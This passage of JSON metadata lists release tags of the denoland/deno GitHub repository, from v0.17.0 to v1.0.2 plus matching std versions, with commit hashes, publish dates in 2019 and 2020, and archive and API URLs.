22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/deno